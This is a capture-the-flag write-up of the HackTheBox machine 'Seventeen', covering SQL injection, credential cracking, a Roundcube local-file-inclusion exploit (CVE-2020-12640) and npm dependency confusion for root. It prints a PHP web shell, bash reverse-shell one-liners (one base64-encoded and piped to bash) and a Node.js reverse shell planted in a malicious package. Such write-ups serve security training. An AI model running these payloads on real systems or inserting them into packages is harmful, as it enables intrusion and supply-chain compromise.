CTF-Writeups/HackTheBox/Seventeen.md

HackTheBox - Seventeen

NMAP

Host is up (0.20s latency).
Not shown: 59883 closed ports, 5649 filtered ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 2e:b2:6e:bb:92:7d:5e:6b:36:93:17:1a:82:09:e4:64 (RSA)
|   256 1f:57:c6:53:fc:2d:8b:51:7d:30:42:02:a4:d6:5f:44 (ECDSA)
|_  256 d5:a5:36:38:19:fe:0d:67:79:16:e6:da:17:91:eb:ad (ED25519)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_  Supported Methods: POST OPTIONS HEAD GET
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Let's begin your education with us! 
8000/tcp open  http    Apache httpd 2.4.38
| http-methods: 
|_  Supported Methods: POST OPTIONS
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: 403 Forbidden
Service Info: Host: 172.17.0.11; OS: Linux; CPE: cpe:/o:linux:linux_kernel

PORT 8000 (HTTP)

Visting this port, it was giving us forbidden error so this could be only accssible through local host

PORT 80 (HTTP)

The web server is using a template page, we don't see anything on the page except for a domain name seventeen.htb

Adding the domain name in /etc/hosts file

Fuzzing for files and directories using diresarch, it didn't found anything

It could be that there are other subdomains as there's nothing really on the seventeen.htb, we can fuzz for subdomains using wfuzz

wfuzz -c -w /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u 'http://seventeen.htb' -H "Host: FUZZ.seventeen.htb" --hh 20689

This returned us a valid response on exam so let's add this subdomain in /etc/hosts file

Visting the admin page we'll see that it's disabled

Looking for exploits regarding Exam Revewier Management System, it showed two exploits

https://www.exploit-db.com/exploits/50725

Since the admin panel is disabled, the authenticated RCE exploit would be useless for us, so checking the sqli on this management system

On running sqlmap on this parameter it showed that this was vulnerable to sqli

The database for this management system was erms_db which showed a mangement named oldmanagement

Add this to /etc/hosts file did infact brought us to a login page

Dumping the databases with --dbs we can see there are 2 more databases, which means that db_sfms might be for the oldmanagement

From this database, it dumped user table which some hashes, also it retrieved hashes from student , so trying to crack them trough crackstation, only one hash was crackable

Logging in with the credentials 31234:autodestruction

This user had uploaded a pdf document, we can download this document and see the contents which reveals antother subdomain mastermailer.seventeen.htb it also talks about some files uploaded somewhere

Fuzzing for files it found a directory called files but it showed that it was forbidden to access

The document mentioned about student's file being uploaded but we don't exaclty know if this is where the files are being uploaded, so I fuzz in files folder with student IDs

Running gobuster again in this directory it found another directory called papers

But this directory was also forbidden for us to access and after running gobuster in here showed nothing

Moving on to adding the subdomain in hosts file we can access mastermailer, I tried logging in with the default credentials which failed

Fuzzing for files on this site also showed some directories which were forbidden except for /installer

Going through the changelog on github for roudcube it was showing two vulnerabilities related to LFI and RCE which was found in several version prior to 1.44

On searching for this exploit the LFI matched our scenario as we didn't have creds to login, it was assigned a CVE number 2020-12640

Searching for poc for this exploit lead me to a github repo of the exploit

https://github.com/DrunkenShells/Disclosures/tree/master/CVE-2020-12640-PHP%20Local%20File%20Inclusion-Roundcube

To exploit this we need first upload a php file named papers.php having the contents

<?php system($_GET['cmd']); ?>

This file gets uploaded in /var/www/html/oldmanagement/files/31234, so path traversal in plugin name would be ../../../../../../../../../../../../../../../var/www/html/oldmanagement/files/31234/papers , we can perform directory traversal in any plugin name we want

Here I have selected zipdownload plugin, intercept the request on update config and in _plugins_zipdownload perform directory traversal

And now going to any php file we can include the GET parameter which was cmd along with the command to be executed

I used bash reverse shell by converting into base64 and decoding by piping and piping again to execute it through bash

bash -i >& /dev/tcp/10.10.14.43/2222 0>&1

echo 'L2Jpbi9iYXNoIC1jICdiYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjQzLzIyMjIgMD4mMScK' | base64 -d | bash

Method 2

If we try accessing the uploaded php file on the oldmangement system it will show a Forbidden error on the page

But on changing the sutdent id at the time of uploading the file it will create a folder with that id and from there we can access the php file

Stabilizing the shell with python

Un-intended Foothold

We can try fuzzing for files and directories here with dirsearch

This found a directory /vendor which had some folders which lead to three sites

Mastermailer

I tried the default credentials there but they didn't worked

Old Management

This is a school management system which is referred as old, so maybe there are vulnearbilities in this site

I looked at the source of the page and found that there maybe an admin panel

I tried the default password admin:admin which is didn't worked here as well

https://www.exploit-db.com/exploits/48437

On trying a basic sqli payload for bypassing login, it worked

There wasn't anything on this site so I moved on

Exams

The third site is a Exam Reviewer Management system

This management also had vulnerabilities and there were two of them, first being sqli and the second authenticated remote code execution

https://www.exploit-db.com/exploits/50725

https://www.exploit-db.com/exploits/50726

The exploit shows that ?p=take_exam&id=1 is vulnearble to sqli, let's first verify as there wasn't a directory erms

Now running sqlmap on this url including the parameter

I tried logging in as admin on this site but admin login was disabled

Going back to the oldmanagement site, I dumped the database and found a student's password hash which was cracked

And logging in with the student id 31234 and password autodestruction it worked and we can see an option to upload a file

I uploaded a basic php shell

On which it just shows a blank page and doesn't upload a file, checking the /files in oldmanagement it also doesn't show the uploaded file

Checking port 8000 again I saw that this management site was also being hosted there as well

With the same credentials and if we upload a file here, it will show that it's uploaded

Also we can access it by using it's absolute path which is

/oldmanagement/files/31234/test.php?cmd=id

Using bash reverse shell, converting into base64 and piping it to bash

And we are inside a docker container, checking /var/www/html for files

Privilege Escalation (Mark)

From the oldmanagenemnt system files we can get mysql creds from conn.php

But it was useless as we already had gotten the tables through sql injection, We do see another management system but it doesn't have database connected to it

It gives an error on login for database connection which reveals the file where the credentials are stored for database, checking the dbh.php

I tried using these credentials on the database but they didn't worked

Reading the /etc/passwd file from the container we can see an entry for mark user

The password 2020bestyearofmylife worked for mark and we got access on the box

Privilege Escalation (kavi)

Checking the home directory there's another user named kavi

On checking what files/folders this user owns

In /var/mail there's a mail for kavi user which talks about a module, loglevel being published on the private registry

From the /opt/app directory we see two intersting files startup.sh and index.js

From the index.js, there's a module which has been removed, it was mentioned that plugins are being published to a private registry, so it could be that this can be installed from that registry as there's a service running on port 4873

Which shows that it's running something calledVerdaccio and on searching about this, this is actually used for private registry for node modules

But simply installing this module will not working as we need to make npm point to local registry

Now this module would be installed in ./node_modules of user's directory

From there we can get another password IhateMathematics123# which will allow us to switch to kavi user

Un-intended Privilege Escalation (kavi)

From the /opt/app there was a module db-logger having password for mysql

This password allowed to switch to kavi user

Privilege Escalation (root)

Running sudo -l we can see that this user can execute /opt/app/startup.sh

cd /opt/app

deps=('db-logger' 'loglevel')

for dep in ${deps[@]}; do
    /bin/echo "[=] Checking for $dep"
    o=$(/usr/bin/npm -l ls|/bin/grep $dep)

    if [[ "$o" != *"$dep"* ]]; then
        /bin/echo "[+] Installing $dep"
        /usr/bin/npm install $dep
    else
        /bin/echo "[+] $dep already installed"

    fi
done

/bin/echo "[+] Starting the app"

/usr/bin/node /opt/app/index.js

This scripts looks for npm packages db-logger and loglevel , since db-logger is already in node_modules loglevel is something we should mess with, it will fetch this module if it isn't installed and then install this module, it will run index.js which includes loglevel and is being used

But we can't write in /opt/app as we have only read rights, right now this module isn't installed

So we can run the script so that this module can be installed

Here we can trick the npm to download loglevel from our hosted repository of node modules which leads to Dependency Confusion , which means that index.js will use our malicious loglevel plugin if the version is above than the current version it's fetching and we can already see that once it's installed the version is 1.8.0 so we need to create a module with a version higher than this

https://0xsapra.github.io/website//Exploiting-Dependency-Confusion

But question is from where exacly is npm fetching packages from, if we check .npmrc in kavi's home directory it's fetching the packages from the registry from localhost which was running on port 4873, it's weird because I didn't saw any package on this system

We can host our own registry for node modules using Verdaccio

https://medium.com/aeturnuminc/publish-and-resolving-npm-packages-using-private-npm-server-easy-step-by-step-c16f886d452f

Installing verdaccio with npm (make sure to have node version 12 or above)

npm install -g verdaccio

Starting vedaccio on tun0 interface

verdaccio -l IP:4873

We need to add a user before hosting node modules

Following this template for making node modules I modified package.json

https://0xsapra.github.io/website//Exploiting-Dependency-Confusion

Adding a node reverse shell within a fucntion called log as it's going to be called in the js file, then publishing the node module

function log (msg)
{
var net = require("net"), sh = require("child_process").exec("/bin/bash");
var client = new net.Socket();
client.connect(4444, "10.10.14.19", function(){client.pipe(sh.stdin);sh.stdout.pipe(client);
sh.stderr.pipe(client);});
}

module.exports = { log }

Replacing the registry control with our hosted registry

Then just starting our netcat listener and running the script

Un-intended (root)

We can see this moudle is installed now and we own this module so we can modify the contents of the javascript file

Just add a node js reverse shell anywhere in the loglevel.js file

After modifying, terminate the script and run it again so it runs with the changes in the module and we'll get a revere shell as a root user on our listener

References

• https://www.exploit-db.com/exploits/50725
• https://roundcube.net/news/2020/04/29/security-updates-1.4.4-1.3.11-and-1.2.10
• https://github.com/roundcube/roundcubemail/releases?page=3
• https://attackerkb.com/topics/JQfuTdv5fa/cve-2020-12640/vuln-details
• https://github.com/DrunkenShells/Disclosures/tree/master/CVE-2020-12640-PHP%20Local%20File%20Inclusion-Roundcube
• https://ibreak.software/2016/08/nodejs-rce-and-a-simple-reverse-shell/
• https://0xsapra.github.io/website//Exploiting-Dependency-Confusion
• https://github.com/nodesource/distributions/blob/master/README.md
• https://medium.com/aeturnuminc/publish-and-resolving-npm-packages-using-private-npm-server-easy-step-by-step-c16f886d452f